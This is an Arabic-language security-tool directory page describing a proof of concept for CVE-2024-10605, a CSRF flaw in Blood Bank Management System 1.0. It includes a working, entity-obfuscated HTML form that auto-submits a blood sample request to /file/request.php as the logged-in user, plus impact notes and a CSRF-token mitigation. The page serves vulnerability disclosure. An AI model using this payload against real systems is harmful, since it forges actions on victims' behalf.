Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-10605 — إثبات المفهوم لـ CVE-2024-10605، ثغرة تزوير الطلبات عبر المواقع (CSRF) في نظام إدارة بنك الدم الإصدار 1.0 تسمح بطلبات عينات دم غير مصرح بها. | Kitploit
أدوات/GitHubGitHub/bevennyamande/cve-2024-10605
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubbevennyamande/cve-2024-10605

CVE-2024-10605

إثبات المفهوم لـ CVE-2024-10605، ثغرة تزوير الطلبات عبر المواقع (CSRF) في نظام إدارة بنك الدم الإصدار 1.0 تسمح بطلبات عينات دم غير مصرح بها.

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

الإصدار المتأثر:

  • نظام إدارة بنك الدم: 1.0

معلومات الثغرة:

  • نوع الثغرة: تزوير الطلبات عبر المواقع (CSRF)
  • الخطورة: عالية
  • الحالة: غير مصححة

نقطة النهاية المتأثرة:

  • المسار: file/request.php

وصف الثغرة:

توجد ثغرة تزوير الطلبات عبر المواقع (CSRF) في نقطة النهاية /file/request.php، والتي تسمح لمستخدم بعيد بتقديم طلب blood sample على حساب receiver الذي قام بتسجيل الدخول، من عينة الدم المتاحة لمستشفى مختار.

يمكن أن يؤدي الاستغلال الناجح إلى إجراءات غير مصرح بها نيابةً عن الضحية. بالإضافة إلى ذلك، يمكن استغلال هذه الثغرة من خلال زيارة مواقع ويب ضارة تحتوي على الحمولة (Payload).


إثبات المفهوم (PoC):

فيما يلي مثال على هجوم إثبات المفهوم (PoC) الخاص بـ CSRF يبدأ طلب blood sample من حساب receiver's المسجّل دخوله:

root@kitploit:~

<html>
    <head>
        <title>CSRF PoC</title>
    </head>
    <body>
        <form action="http://&#108;&#111;&#99;&#97;&#108;&#104;&#111;&#115;&#116;&#46;&#108;&#111;&#99;&#97;&#108;&#47;&#98;&#108;&#111;&#111;&#100;&#98;&#97;&#110;&#107;&#47;&#102;&#105;&#108;&#101;&#47;&#114;&#101;&#113;&#117;&#101;&#115;&#116;&#46;&#112;&#104;&#112;" method="POST" enctype="application/x-www-form-urlencoded">
            <input name="&#98;&#105;&#100;" value="&#49;&#54;">
            <input name="&#104;&#105;&#100;" value="&#51;">
            <input name="&#98;&#103;" value="&#66;&#45;">
            <input name="&#114;&#101;&#113;&#117;&#101;&#115;&#116;" value="&#82;&#101;&#113;&#117;&#101;&#115;&#116;&#43;&#83;&#97;&#109;&#112;&#108;&#101;">
        </form>
        <script>
            document.querySelector("form").submit();
        </script>
    </body>
</html>






الأثر:

  • التلاعب بالبيانات: يمكن للمهاجمين تعديل المحتوى المعروض على المستخدمين.
  • الضرر بالسمعة: قد يفقد المستخدمون الثقة في النظام بسبب السلوك الضار.

توصيات التخفيف:

  1. استخدم رمز CSRF نفّذ آلية لمنع الوصول عبر النطاقات المختلفة أو ضع csrf tokens في طلبك.
تنزيل الأداة